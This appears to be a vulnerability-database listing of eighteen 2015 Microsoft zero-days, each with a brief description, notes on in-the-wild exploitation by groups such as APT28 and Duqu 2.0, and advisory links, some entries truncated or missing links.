Zero-day vulnerabilities discovered: 18
Memory corruption
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The vulnerability exists due to boundary error when handling of objects in kernel memory. A local attacker can execute a specially crafted program, trigger memory corruption and gain SYSTEM privileges.
Successful exploitation of this vulnerability results in privilege escalation on the vulnerable system.
Note: the vulnerability was being actively exploited.
Software: Windows
Links:
https://www2.trustwave.com/rs/815-RFM-693/images/2016%20Trustwave%20Global%20Security%20Report.pdf
https://technet.microsoft.com/library/security/ms15-135
https://www.symantec.com/security_response/vulnerability.jsp?bid=78514
http://www.securityweek.com/microsoft-patches-windows-office-flaws-exploited-wild
Arbitrary code execution
The vulnerability allows a remote authenticated attacker to execute arbitrary code on the target system.
The vulnerability exists due to improper handling of Media Center link (.mcl) files. A remote attacker can create a specially crafted Media Center link (.mcl) file that references malicious code, trick the victim into opening it and execute arbitrary code with privileges of the current user.
Successful exploitation of this vulnerability results in system compromise.Note: the vulnerability was being actively exploited.
This vulnerability is related to a previously unreported zero-day exploit discovered in the Hacking Team leaked emails. Trend Micro researchers (Aaron Luo, Kenney Lu, and Ziv Chang) discovered the exploit and subsequently reported their findings to Microsoft.
Software: Windows Media Center
Links:
https://www2.trustwave.com/rs/815-RFM-693/images/2016%20Trustwave%20Global%20Security%20Report.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fix...
https://technet.microsoft.com/library/security/ms15-100
http://www.cio.com/article/2982358/microsoft-patches-yet-another-hacking-team-zero-day-exploit.html
http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fix...
http://resources.infosecinstitute.com/exploiting-ms15-100-cve-2015-2509/#gref
http://www.csoonline.com/article/2982487/vulnerabilities/microsoft-patches-yet-another-hacking-team-...
http://securityaffairs.co/wordpress/40019/hacking/windows-media-center-ht-bug.html
https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS15_100_MCL_EXE
https://www.symantec.com/security_response/vulnerability.jsp?bid=76594
http://www.pcworld.com/article/2982361/microsoft-patches-yet-another-hacking-team-zero-day-exploit.h...
Memory corruption
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The weakness exists due to boundary error in ATMFD.dll in Win32k.sys. A local attacker can execute a specially crafted program, trigger memory corruption and gain SYSTEM privileges.
Successful exploitation of the vulnerability may result in full control of the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability was reported by FireEye researcher Wang Yu.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-097
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
https://www.symantec.com/security_response/vulnerability.jsp?bid=76608
https://krebsonsecurity.com/2015/09/microsoft-pushes-a-dozen-security-updates/
http://www.securityweek.com/microsoft-patches-windows-vulnerability-exploited-wild
https://www.scmagazine.com/microsoft-fixes-several-bugs-on-patch-tuesday-two-being-actively-exploite...
https://www.helpnetsecurity.com/2015/09/09/microsoft-pushes-out-security-updates-plugs-holes-activel...
https://threatpost.com/microsoft-patches-graphics-component-flaw-under-attack/114575/
http://www.securitynewspaper.com/2015/09/09/microsoft-patches-graphics-component-flaw-under-attack/
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to boundary error when parsing malformed images. A remote attacker can create a file containing a specially crafted image file, trick the victim into opening it, cause memory corruption and execute arbitrary code with privileges of the current user.
Successful exploitation of this vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
CVE-2015-2545 fuels around 17% of attacks in Microsoft Office.
Used to target organisations in China.
Software: Microsoft Office
Links:
https://technet.microsoft.com/en-us/library/security/ms15-099
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
http://pwc.blogs.com/cyber_security_updates/2016/05/exploring-cve-2015-2545-and-its-users.html
https://threatpost.com/apt-groups-finding-success-with-patched-microsoft-flaw/118298/
http://www.securityweek.com/year-old-office-vulnerabilities-most-popular-current-attacks
https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/
https://www.symantec.com/security_response/vulnerability.jsp?bid=76667
https://blogs.sophos.com/2016/07/18/cybercriminals-shift-their-tactics-for-microsoft-office-document...
https://www.threatconnect.com/blog/word-document-trojan-exploiting-cve/
http://www.itworldcanada.com/article/exploit-kits-now-adopting-recent-office-vulnerabilities-report/...
https://www.scmagazine.com/microsoft-fixes-several-bugs-on-patch-tuesday-two-being-actively-exploite...
http://blog.morphisec.com/exploit-bypass-emet-cve-2015-2545
http://news.softpedia.com/news/one-microsoft-office-exploit-has-become-very-popular-with-cyber-espio...
http://news.softpedia.com/news/ke3chang-is-back-and-it-s-targeting-indian-embassies-around-the-globe...
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The weakness exists due to boundary error when handling Javascript and HTML tables within the layout cache. A remote attacker can create a specially crafted Web site, trick the victim into visiting it, trigger memory corruption and execute arbitrary code with privileges of the current user.
Successful exploitation results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability has been exploited in watering hole attacks against compromised website belonging to an evangelical church in Hong Kong to deliver Korplug malware.
Software: Microsoft Internet Explorer
Known/fameous malware:
Korplug malware.
Links:
https://technet.microsoft.com/library/security/MS15-093
http://www.securityweek.com/microsoft-issues-emergency-patch-critical-ie-flaw-exploited-wild
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28195
https://www.alienvault.com/blogs/security-essentials/internet-explorer-memory-corruption-vulnerabili...
https://www.tripwire.com/state-of-security/vulnerability-management/ie-under-attack-microsoft-releas...
https://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/
https://www.redpacketsecurity.com/cve-2015-2502-microsoft-issues-emergency-patch-for-all-versions-of...
https://blog.qualys.com/laws-of-vulnerabilities/2015/08/18/ms15-093--oob-fix-for-internet-explorer
https://arstechnica.com/security/2015/08/microsoft-issues-emergency-patch-for-critical-ie-bug-under-...
https://www.scmagazine.com/microsoft-patches-critical-remote-code-execution-bug-in-internet-explorer...
https://www.symantec.com/connect/tr/blogs/new-internet-explorer-zero-day-exploited-hong-kong-attacks
https://malwarelist.net/tag/zero-day-vulnerability/
http://www.darkreading.com/attacks-breaches/ie-bug-exploited-in-wild-after-microsoft-releases-out-of...
http://thehackernews.com/2015/08/microsoft-emergency-patch-zero-day-internet-explorer.html
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to boundary error when processing Microsoft Office documents. A remote unauthenticated attacker can create a specially crafted Office document, trick the victim into opening it and execute arbitrary code on the target system with privileges of the current user.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Note: this vulnerability is being actively exploited.
The vulnerability was discovered by Yong Chuan, Koh of MWR Labs.
Software: Microsoft Office
Links:
https://technet.microsoft.com/en-us/library/security/ms15-081.aspx
https://www.symantec.com/security_response/vulnerability.jsp?bid=76200
https://www.nccgroup.trust/uk/our-research/understanding-microsoft-word-ole-exploit-primitives/
https://labs.mwrinfosecurity.com/advisories/microsoft-office-ctasksymbol-use-after-free-vulnerabilit...
http://blog.trendmicro.com/trendlabs-security-intelligence/august-patch-tuesday-includes-update-for-....
Privilege escalation
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The vulnerability exists due to improper processing of symbolic links by Mount Manager. By inserting a specially crafted USB device into the system, an attacker can create arbitrary files and execute malicious code with SYSTEM privileges.
Successful exploitation of this vulnerability may result in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
Attackers used USB to infect computers with the malware at the Natanz uranium enrichment facility in Iran.
The .LNK vulnerability was also exploited by the Equation Group, uncovered by researchers at Kaspersky Lab.
Software: Windows
Known/fameous malware:
Fanny
Links:
https://technet.microsoft.com/en-us/library/security/ms15-085.aspx https://blogs.technet.microsoft.com/srd/2015/08/11/defending-against-cve-2015-1769-a-logical-issue-e...
https://cdn4.esetstatic.com/eset/US/resources/docs/white-papers/Windows_Exploitation_in_2015.pdf
https://threatpost.com/microsoft-patches-usb-related-flaw-used-in-targeted-attacks/114240/
https://threats.kaspersky.com/en/vulnerability/KLA10646/
https://www.sophos.com/en-us/threat-center/threat-analyses/vulnerabilities/VET-000786.aspx
http://www.securityweek.com/microsoft-adobe-patch-dozens-security-vulnerabilities
Buffer overflow
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to buffer overflow in Windows Adobe Type Manager library when processing OpenType fonts. A remote attacker can create a specially crafted document or website with embedded malicious OpenType font, trick the victim into opening it, cause memory corruption and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
Note: the vulnerability was being actively exploited.
The exploit code was revealed after Hacking Team data leak.
The vulnerability was reported by FireEye's Genwei Jiang and Google Project Zero's Mateusz Jurczyk.
The vulnerability has being exploited by Eugene Ching of Qavar Security on the January 2015.
Software: Windows
Links:
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The weakness exists due to boundary error. A remote attacker can create a specially crafted Web-site, trick the victim into visiting it, trigger memory corruption and execute arbitrary code with privileges of the current user.
Successful exploitation of the vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
The exploit code was revealed after Hacking Team data leak.
Software: Microsoft Internet Explorer
Links:
Memory corruption
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The weakness exists due to boundary error in the Adobe Type Manager module (ATMFD.dll). A local attacker can execute a specially crafted application, trigger memory corruption, bypass OS-level sandboxing and execute arbitrary code with SYSTEM privileges.
Successful exploitation of the vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.The exploit code was revealed after Hacking Team data leak.
Public exploit code for this vulnerability became available as part of the Hacking Team leaks on July 5, 2015.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-077.aspx http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-at-the-open-type-font-manager-vuln...
http://www.securityweek.com/microsoft-patches-hacking-team-zero-days-other-vulnerabilities
https://countuponsecurity.com/2015/07/24/hacking-team-arsenal-of-cyber-weapons/
https://securingtomorrow.mcafee.com/business/security-connected/microsoft-patch-tuesday-july-2015/
http://www.bankinfosecurity.com/hacking-team-dump-windows-zero-day-a-8404
https://www.secureworks.com/blog/targeted-exploit-and-escalation
Heap-based buffer overflow
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to heap-based buffer overflow when processing Office files. A remote attacker can create a specially crafted Office file, trick the victim into opening it, cause memory corruption and execute arbitrary code with privileges of the current user.
Successful exploitation of this vulnerability results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability reffers to the APT28 and Operation Pawn Storm and was used in cyber espionage campaign by Tsar Team.
Software: Microsoft Office
Known/fameous malware:
Trojan.Win32.Sofacy.
Links:
https://technet.microsoft.com/en-us/library/security/ms15-070.aspx
http://resources.infosecinstitute.com/the-shadow-of-the-russian-cyber-army-behind-the-2016-president...
https://www.trustwave.com/Resources/SpiderLabs-Blog/Tsar-Team-Microsoft-Office-Zero-Day-CVE-2015-242...
https://www.symantec.com/security_response/vulnerability.jsp?bid=75744
http://www.securityweek.com/microsoft-patches-office-zero-day-bug-used-apt-group
Memory corruption
The vulnerability allows a local attacker to obtain elevated privileges on the target system.Expoited by Duqu 2.0 and used in attack against the Kaspersky Lab to hack their internal networks in early spring 2015.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-061.aspx
https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-ac...
http://securityaffairs.co/wordpress/37714/cyber-crime/duqu-2-0-hit-kaspersky.html
http://blog.trendmicro.com/trendlabs-security-intelligence/analysis-of-cve-2015-2360-duqu-2-0-zero-d...
https://www.symantec.com/security_response/vulnerability.jsp?bid=75025
http://blog.ensilo.com/ms-patch-tuesday-a-look-into-4-vulnerabilities-in-the-windows-kernel
https://www.virusbulletin.com/conference/vb2015/abstracts/duqu-2-0-win32k-exploit-analysis/
http://usa.kaspersky.com/about-us/press-center/press-releases/2015/duqu-back-kaspersky-lab-reveals-c..
https://blogs.bromium.com/2015/06/16/duqu-2-0-whos-the-lord-of-ring0/
Privilege escalation
The vulnerability allows a local attacker to gain elevated privileges on the target system.
The weakness exists due to improper access control. A local attacker can create a specially crafted application, execute a callback in userspace and use data from the System token to execute arbitrary code on the system with root privileges.
Successful exploitation of the vulnerability may result in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.The vulnerability was combined with CVE-2015-3043 to perform Operation "Russian Doll".
Exploited by Russia’s APT28 (Fancy Bear APT) in cyber espionage campaign on the U.S defense contractors, European security companies and Eastern European government entities.
Software: Windows
Links:
https://technet.microsoft.com/en-us/library/security/ms15-051
https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html http://resources.infosecinstitute.com/the-shadow-of-the-russian-cyber-army-behind-the-2016-president...
http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-cve-2015-1701-a-win32k-elevatio...
https://www.symantec.com/security_response/vulnerability.jsp?bid=74245
https://www.reddit.com/r/microsoft/comments/334zyo/russia_use_unpatched_cve20151701_in/
https://thehacktimes.com/cyber-espionage-operation-russian-doll/
http://www.eweek.com/security/russian-based-attackers-use-two-zero-days-in-one-attack.html
Memory corruption
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The weakness exists due to boundary error when handling rich text format files. A remote attacker can create a specially crafted RTF document, trick the victim into opening it, trigger memory corruption and execute arbitrary code with privileges of the current user.
Successful exploitation results in arbitrary code execution on the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability accounts for nearly 66% of attacks using Office Word.
APT attacks, targeting Tibetans, Uyghurs, human rights groups in Taiwan and Hong Kong, and journalists.
Software: Microsoft Office
Links:
https://technet.microsoft.com/en-us/library/security/ms15-033.aspx
http://www.securityweek.com/year-old-office-vulnerabilities-most-popular-current-attacks
https://degsew.wordpress.com/2016/03/28/new-microst-office-word-2007-2013-exploit-cve-2015-1641-anal...
http://news.softpedia.com/news/cve-2015-1641-and-cve-2015-2545-are-today-s-most-popular-microsoft-wo...
http://www.securityweek.com/spear-phishing-attacks-target-industrial-firms-kaspersky-lab-ics-cert
http://www.securitynewspaper.com/2016/07/19/cve-2015-1641-cve-2015-2545-todays-popular-microsoft-wor...
Insecure dll. library loading
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to the way Microsoft Windows parses shortcuts. A remote attacker can place a specially crafted .dll file along with an icon file on a remote SMB or WebDav share, trick the victim into opening that document and execute arbitrary code on the target system with privileges of the current user.
Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.
Note: the vulnerability was being actively exploited.
According to Trustwave it is a zero-day.
Vulnerability CVE-2015-0096 is a continuation of CVE-2010-2568, which was believed to have been patched by MS10-046. However, it was not completely and we see this with MS15-018. At the time of the patch release there were fully functional exploits for this particular vulnerability.
Software: Windows
Security bypass
The vulnerabiity allows a remote attacker to bypass security restrictions on the target system.Allegedly, Chinese hackers combined it with a remote-code execution vulnerability in Adobe Flash to infect visitors to the Forbes website with malware since November, 2014.
Software: Microsoft Internet Explorer
Known/fameous malware:
JS:CVE-2015-0071-A.
Links:
https://technet.microsoft.com/library/security/ms15-009
https://cdn4.esetstatic.com/eset/US/resources/docs/white-papers/Windows_Exploitation_in_2015.pdf
https://www.symantec.com/security_response/vulnerability.jsp?bid=72455
http://blog.trendmicro.com/trendlabs-security-intelligence/bypassing-aslr-with-cve-2015-0071-an-out-...
https://www.invincea.com/2015/02/chinese-espionage-campaign-compromises-forbes/
http://www.theregister.co.uk/2015/02/10/patch_tuesday_release_fixes_unprecedented_zeroday_design_fla...
https://www.hackread.com/hackers-use-flash-and-ie-to-target-forbes-visitors/
https://arstechnica.com/security/2015/02/pwned-in-7-seconds-hackers-use-flash-and-ie-to-target-forbe...
http://www.securityweek.com/microsoft-patches-critical-windows-internet-explorer-vulnerabilities-pat...
http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html
https://www.scmagazine.com/forbescom-attackers-exploited-zero-days-in-flash-ie/article/536348/
https://arstechnica.com/security/2015/02/pwned-in-7-seconds-hackers-use-flash-and-ie-to-target-forbe...
Cross-site scripting
The vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.CVE-2015-0072 was apparently reported to Microsoft on Oct. 13, 2014, however David Leo disclosed the details of this vulnerability to the popular Full Disclosure security mailing list on Jan. 31, 2015.
Software: Microsoft Internet Explorer
Known/fameous malware:
Exploit: HTML/CVE-2015-0072.A
Links:
https://technet.microsoft.com/library/security/ms15-018
http://www.pcworld.com/article/2879372/dangerous-ie-vulnerability-opens-door-to-powerful-phishing-at...
https://nakedsecurity.sophos.com/2015/02/04/internet-explorer-has-a-cross-site-scripting-zero-day-bu...
https://blogs.forcepoint.com/security-labs/another-day-another-zero-day-%E2%80%93-internet-explorers...
http://22by7.helpserve.com/News/NewsItem/View/5773/another-day-another-zero-day--internet-explorers-...
Path traversal
The vulnerability allows a remote attacker to gain elevated privileges on the target system.
The weakness exists due to insufficient validation of user-supplied input within TS WebProxy Windows component. A remote attacker can trick the victim into downloading a specially crafted file and execute it with privileges of the current user.
Successful exploitation of the vulnerability may result in full control of the vulnerable system.
Note: the vulnerability was being actively exploited.
The vulnerability was being used in CNACOM campaign targeting government organization in Taiwan.
Software: Windows
Known/fameous malware:
Exploit.Win32.CVE-2015-0016.
Links:
https://technet.microsoft.com/library/security/ms15-004
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explo...
https://www.symantec.com/security_response/vulnerability.jsp?bid=71965
http://www.securityweek.com/china-linked-spies-target-taiwan-ie-exploit
http://securityaffairs.co/wordpress/33153/cyber-crime/fessleak-malvertising-campaign.html
http://securityaffairs.co/wordpress/54093/intelligence/cnacom-campaign.html